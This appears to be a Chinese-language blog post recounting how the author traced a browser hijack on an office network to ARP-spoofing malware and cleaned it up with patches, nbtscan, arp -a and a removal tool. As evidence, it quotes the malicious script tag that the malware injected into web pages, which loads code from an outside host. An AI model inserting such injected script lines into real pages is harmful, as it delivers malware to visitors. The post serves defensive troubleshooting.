文章作者:CCN
上午
打开办公室电脑的浏览器上网,打开速度出奇的慢,而且打开霏凡后还出现页面错误,查看一下错误提示,出现一个网址
http://9166.biz/1.htm 代码错误,看来浏览器有病毒“劫持”了,ping了一下,还是个韩国的地址!
1 . 首要做的观察进程:冰刃里没有可疑进程,服务里也没发现可疑的!这就怪了?hijack日志基本上干干净净,启动项目页无异常!
2. 打开杀软nod32,升级后在内存和系统盘终没有查到病毒,同时在安全模式下用Dr.Web查毒,也没有发现,这下我真正郁闷了!最信任的Dr.Web都没有发现!
仔细分析一下:在打开网页时杀软有病毒报警,”IE浏览器创建了一个病毒进程”,”自动删除”,刷新页面重新出现病毒报警!看来是网页病毒!重打开冰刃,在端口连接中看到 ie进程连接到病毒网站的 ip!看来,或者浏览器设置有问题,或者有dll木马插入ie进程!
3. 按照技术区的朋友说的 ,搜索系统文件夹,搜索内容为该网站地址,但一无所获,清理完ie的临时文件夹,看看局域网*****设置也是空的,上googel,没有问题,进 霏凡的时候又提示“正在打开
http://9166.biz/1.htm ”,又跑进来了还是根本没送走?进51.com的个人主页根本不行!
换用了火狐,一样会在端口连接里看到我 可爱的火狐 和那恶意网站手握手已经建立连接,唉,真郁闷,我怀疑还是dll劫持,但分析了ie和火狐的dll,太多,杀软又无法查到,真的不知所措!
下午
下个360的专杀工具,没有查到!郁闷!
到bbs问问网友吧!听听龙族朋友的意见:
“开机,F8,选择“带网络连接的安全模式”
进入系统后下载安装这两个程序
http://dl.360safe.com/setup.exehttp://tool.ikaka.com/DownloadTool.asp?tools=1分别用它们修复系统,清理流氓软件”
“试试avg杀毒看看啦。。。。”
基本还是查毒为主,一一试了,还是不管用,一位朋友说到(局域网电脑感染了ARP病毒,该病毒会修改同网段电脑的ARP表,使同网段所有电脑的路由通过染毒机器,病毒会将HTTP包解包以后,加上病毒代码后重新封包,转发出去。该病毒是利用微软操作系统得MS06-014和MS07-017漏洞传播的,如果没有安装这两个漏洞的补丁,访问带病毒的网页,或者同网段有机器带毒,就会被感染成为毒源。)呵呵,那就打补丁吧,装好MS06-014和MS07-017补丁,打开网页没报错了,但速度还是有点影响,既然说到病毒会将HTTP包加病毒代码重新封装转发,我想到是不是网页代码被修改了,忍不住查看一下有问题网页的源代码,第一行赫赫显示着<script src=http://9166.biz/w.js></script> ,看来真如所料,是arp病毒!
【解决方法】既然确定是arp病毒,开个cmd,输入 nbtscan -r 10.10.10.0/24,注意这个命令有时观察不完整,需要跟个 arp -a命令查看 arp表,观察到一mm的电脑跟网关电脑的 mac地址相同,给mm传个 360 的专杀工具,1秒就搞定,重新启动,总算网络太平!